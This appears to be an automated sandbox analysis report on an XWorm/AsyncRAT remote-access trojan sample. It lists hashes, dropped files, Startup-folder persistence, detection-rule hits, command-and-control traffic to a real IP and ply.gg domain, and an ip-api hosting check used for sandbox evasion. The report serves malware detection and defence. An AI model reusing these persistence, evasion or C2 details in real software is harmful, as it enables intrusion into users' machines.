                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_semkodpj.ii0.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sj3t4gbf.4gx.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x112r4y2.yyx.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Roaming\Discord.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\s3OBQLA3xR.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):358912
                                    Entropy (8bit):3.7321662222649703
                                    Encrypted:false
                                    SSDEEP:1536:Fnnl3cS+NOAiebtmUcpCzb6HmnIOkPTbepp65U:FlMSSOQbtmpROkPPevSU
                                    MD5:8090C678B1AB88D330D94A8012682263
                                    SHA1:062E28C4A590A278CEFF6A3931498D53DB6812EC
                                    SHA-256:2B2A240FBDA2933B546A6D1B495D21878B9BF67DA1C7E5B4CAD29C8B82C5D706
                                    SHA-512:ECD6B917EAB7D2E62006E58DA5E839AF15EF6ABDF1ECF35DBFE2F6E354EF81E5FE23254480E5E6E5D8DD843C954BB23EF1331132485F08AA7737F0D27D2634A8
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Discord.exe, Author: Joe Security
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Discord.exe, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Discord.exe, Author: ditekSHen
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 76%
                                    • Antivirus: Virustotal, Detection: 65%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|..g.....................d.......3... ...@....@.. ....................................@.................................43..W....@...a........................................................................... ............... ..H............text........ ...................... ..`.rsrc....a...@...b..................@..@.reloc...............x..............@..B................p3......H........c..@.......&.....................................................(....*.r...p*. ..e.*..(....*.r...p*. ....*.s.........s.........s.........s.........*.r-..p*. .1z.*.rC..p*. .W..*.rY..p*. ....*.ro..p*. ~.H.*.r...p*. 8=..*..((...*.r...p*. .*b.*.r...p*. .3g.*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. ..u.*.r...p*. .M..*.r"..p*. ..}.*.r8..p*. ..~.*.r...p*. ....*.r...p*. e...*.r@.

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk

                                    Download File
                                    Process:C:\Users\user\Desktop\s3OBQLA3xR.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Oct 13 15:52:52 2024, mtime=Sun Oct 13 15:52:52 2024, atime=Sun Oct 13 15:52:52 2024, length=358912, window=hide
                                    Category:dropped
                                    Size (bytes):764
                                    Entropy (8bit):5.069927998898393
                                    Encrypted:false
                                    SSDEEP:12:86vvL1246YLHWCTDdY//tuKlLdN+8KbhiUjAs15rH9q0ZBmV:86vv16YaMD+g+DKb/AszZq0ZBm
                                    MD5:D02AEC4CE76850C4E6F32123EC2622D7
                                    SHA1:B8C5BA5509A32AFF6C8B26DEA1D8DF615FD9FC93
                                    SHA-256:D5369E84B4A47CC3D41BD28449E38D2549425784B2CEF92FF84832682DDB8AA9
                                    SHA-512:D2BC36EE8E6C663155AF89DFE40FE93C721ADDBB9BE2DC7F245AD86F2D1424FFBA4834AFF1D54F64DE3DF317AD534BA7AACA3100AEAD1090EBACE726E896A85B
                                    Malicious:false
                                    Preview:L..................F.... ...a..X....a..X....a..X.....z......................v.:..DG..Yr?.D..U..k0.&...&......vk.v......2....DD9X........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^MY|............................%..A.p.p.D.a.t.a...B.V.1.....MYz...Roaming.@......CW.^MYz.............................&.R.o.a.m.i.n.g.....b.2..z..MY.. .Discord.exe.H......MY..MY......L........................D.i.s.c.o.r.d...e.x.e.......Y...............-.......X...........B........C:\Users\user\AppData\Roaming\Discord.exe........\.....\.....\.....\.....\.D.i.s.c.o.r.d...e.x.e.`.......X.......051829...........hT..CrF.f4... .e.......,.......hT..CrF.f4... .e.......,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):3.7321662222649703
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    File name:s3OBQLA3xR.exe
                                    File size:358'912 bytes
                                    MD5:8090c678b1ab88d330d94a8012682263
                                    SHA1:062e28c4a590a278ceff6a3931498d53db6812ec
                                    SHA256:2b2a240fbda2933b546a6d1b495d21878b9bf67da1c7e5b4cad29c8b82c5d706
                                    SHA512:ecd6b917eab7d2e62006e58da5e839af15ef6abdf1ecf35dbfe2f6e354ef81e5fe23254480e5e6e5d8dd843c954bb23ef1331132485f08aa7737f0d27d2634a8
                                    SSDEEP:1536:Fnnl3cS+NOAiebtmUcpCzb6HmnIOkPTbepp65U:FlMSSOQbtmpROkPPevSU
                                    TLSH:7A74E6E87798BF16D5BECFBC08B192129D79BD139913910B728436C90633ACB8532DE5
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|..g.....................d.......3... ...@....@.. ....................................@................................

                                    File Icon

                                    Icon Hash:0f2b69d4d44d330f

                                    Static PE Info

                                    General

                                    Entrypoint:0x41338e
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x670BE87C [Sun Oct 13 15:34:20 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x133340x57.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000x461da.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x5c0000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000x113940x114003511a25db0664d02f5fe8d510d03c11cFalse0.5959437273550725data6.072669550830597IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rsrc0x140000x461da0x46200f660424e29963900dc0bd6e6dd0414e4False0.03251726827094474data2.5681539357127345IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x5c0000xc0x2001f6912a6eb0911523c9bfd491727d10cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x141c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.32180851063829785
                                    RT_ICON0x146280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.18785178236397748
                                    RT_ICON0x156d00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.17074688796680498
                                    RT_ICON0x17c780x42028Device independent bitmap graphic, 256 x 512 x 32, image size 00.020719294611947808
                                    RT_GROUP_ICON0x59ca00x3edata0.7580645161290323
                                    RT_VERSION0x59ce00x310data0.4362244897959184
                                    RT_MANIFEST0x59ff00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                    Imports

                                    DLLImport
                                    mscoree.dll_CorExeMain

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-10-13T18:53:03.649760+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2320557192.168.2.449739TCP
                                    2024-10-13T18:53:03.649760+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.185.221.2320557192.168.2.449739TCP
                                    2024-10-13T18:53:06.230258+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2320557192.168.2.449739TCP
                                    2024-10-13T18:53:06.231787+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739147.185.221.2320557TCP
                                    2024-10-13T18:53:17.851676+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.449739147.185.221.2320557TCP
                                    2024-10-13T18:53:18.164978+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2320557192.168.2.449739TCP
                                    2024-10-13T18:53:18.172927+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739147.185.221.2320557TCP
                                    2024-10-13T18:53:30.105647+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2320557192.168.2.449739TCP
                                    2024-10-13T18:53:30.108364+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739147.185.221.2320557TCP
                                    2024-10-13T18:53:33.655222+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2320557192.168.2.449739TCP
                                    2024-10-13T18:53:33.655222+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.185.221.2320557192.168.2.449739TCP
                                    2024-10-13T18:53:42.035887+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2320557192.168.2.449739TCP
                                    2024-10-13T18:53:42.037340+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739147.185.221.2320557TCP
                                    2024-10-13T18:53:53.980479+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2320557192.168.2.449739TCP
                                    2024-10-13T18:53:53.982449+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739147.185.221.2320557TCP
                                    2024-10-13T18:53:58.194733+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2320557192.168.2.449739TCP
                                    2024-10-13T18:53:58.197296+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739147.185.221.2320557TCP
                                    2024-10-13T18:54:00.345370+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2320557192.168.2.449739TCP
                                    2024-10-13T18:54:00.347724+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739147.185.221.2320557TCP
                                    2024-10-13T18:54:00.560207+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2320557192.168.2.449739TCP
                                    2024-10-13T18:54:00.563723+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739147.185.221.2320557TCP
                                    2024-10-13T18:54:01.284864+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2320557192.168.2.449739TCP
                                    2024-10-13T18:54:01.289531+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739147.185.221.2320557TCP
                                    2024-10-13T18:54:03.650096+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2320557192.168.2.449739TCP
                                    2024-10-13T18:54:03.650096+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.185.221.2320557192.168.2.449739TCP
                                    2024-10-13T18:54:10.359906+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2320557192.168.2.449739TCP
                                    2024-10-13T18:54:10.360654+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739147.185.221.2320557TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 13, 2024 18:52:01.316148043 CEST4973080192.168.2.4208.95.112.1
                                    Oct 13, 2024 18:52:01.321202040 CEST8049730208.95.112.1192.168.2.4
                                    Oct 13, 2024 18:52:01.321300030 CEST4973080192.168.2.4208.95.112.1
                                    Oct 13, 2024 18:52:01.321923971 CEST4973080192.168.2.4208.95.112.1
                                    Oct 13, 2024 18:52:01.326750040 CEST8049730208.95.112.1192.168.2.4
                                    Oct 13, 2024 18:52:01.818238974 CEST8049730208.95.112.1192.168.2.4
                                    Oct 13, 2024 18:52:01.866627932 CEST4973080192.168.2.4208.95.112.1
                                    Oct 13, 2024 18:52:48.242077112 CEST8049730208.95.112.1192.168.2.4
                                    Oct 13, 2024 18:52:48.242151022 CEST4973080192.168.2.4208.95.112.1
                                    Oct 13, 2024 18:52:53.893053055 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:52:53.899662971 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:52:53.899745941 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:52:53.945575953 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:52:53.950433016 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:53:03.649760008 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:53:03.695147991 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:53:05.918101072 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:53:05.923027992 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:53:06.230257988 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:53:06.231786966 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:53:06.236743927 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:53:17.851675987 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:53:17.856710911 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:53:18.164978027 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:53:18.172926903 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:53:18.177800894 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:53:29.789439917 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:53:29.794426918 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:53:30.105647087 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:53:30.108364105 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:53:30.113280058 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:53:33.655221939 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:53:33.710870981 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:53:41.726871967 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:53:41.732114077 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:53:41.837747097 CEST4973080192.168.2.4208.95.112.1
                                    Oct 13, 2024 18:53:41.843002081 CEST8049730208.95.112.1192.168.2.4
                                    Oct 13, 2024 18:53:42.035887003 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:53:42.037339926 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:53:42.042201042 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:53:53.664572954 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:53:53.669591904 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:53:53.980479002 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:53:53.982449055 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:53:53.987377882 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:53:57.883028030 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:53:57.888012886 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:53:58.194732904 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:53:58.197295904 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:53:58.202299118 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:54:00.039427042 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:54:00.044399977 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:54:00.195662022 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:54:00.200671911 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:54:00.345370054 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:54:00.347723961 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:54:00.352586031 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:54:00.560206890 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:54:00.563723087 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:54:00.568542957 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:54:00.917521954 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:54:00.922672033 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:54:01.284863949 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:54:01.289530993 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:54:01.294441938 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:54:03.650095940 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:54:03.796745062 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:54:10.039300919 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:54:10.046318054 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:54:10.359905958 CEST2055749739147.185.221.23192.168.2.4
                                    Oct 13, 2024 18:54:10.360654116 CEST4973920557192.168.2.4147.185.221.23
                                    Oct 13, 2024 18:54:10.365539074 CEST2055749739147.185.221.23192.168.2.4

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 13, 2024 18:52:01.301738024 CEST6132853192.168.2.41.1.1.1
                                    Oct 13, 2024 18:52:01.310137987 CEST53613281.1.1.1192.168.2.4
                                    Oct 13, 2024 18:52:53.873722076 CEST5057653192.168.2.41.1.1.1
                                    Oct 13, 2024 18:52:53.888708115 CEST53505761.1.1.1192.168.2.4

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Oct 13, 2024 18:52:01.301738024 CEST192.168.2.41.1.1.10x2b47Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                    Oct 13, 2024 18:52:53.873722076 CEST192.168.2.41.1.1.10x1c83Standard query (0)methods-availability.gl.at.ply.ggA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Oct 13, 2024 18:52:01.310137987 CEST1.1.1.1192.168.2.40x2b47No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                    Oct 13, 2024 18:52:53.888708115 CEST1.1.1.1192.168.2.40x1c83No error (0)methods-availability.gl.at.ply.gg147.185.221.23A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • ip-api.com

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.449730208.95.112.1807352C:\Users\user\Desktop\s3OBQLA3xR.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 18:52:01.321923971 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                    Host: ip-api.com
                                    Connection: Keep-Alive
                                    Oct 13, 2024 18:52:01.818238974 CEST175INHTTP/1.1 200 OK
                                    Date: Sun, 13 Oct 2024 16:52:01 GMT
                                    Content-Type: text/plain; charset=utf-8
                                    Content-Length: 6
                                    Access-Control-Allow-Origin: *
                                    X-Ttl: 60
                                    X-Rl: 44
                                    Data Raw: 66 61 6c 73 65 0a
                                    Data Ascii: false


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:12:51:57
                                    Start date:13/10/2024
                                    Path:C:\Users\user\Desktop\s3OBQLA3xR.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\s3OBQLA3xR.exe"
                                    Imagebase:0x860000
                                    File size:358'912 bytes
                                    MD5 hash:8090C678B1AB88D330D94A8012682263
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2995661677.0000000012BB2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2995661677.0000000012BB2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2966183851.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1684003889.0000000000862000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
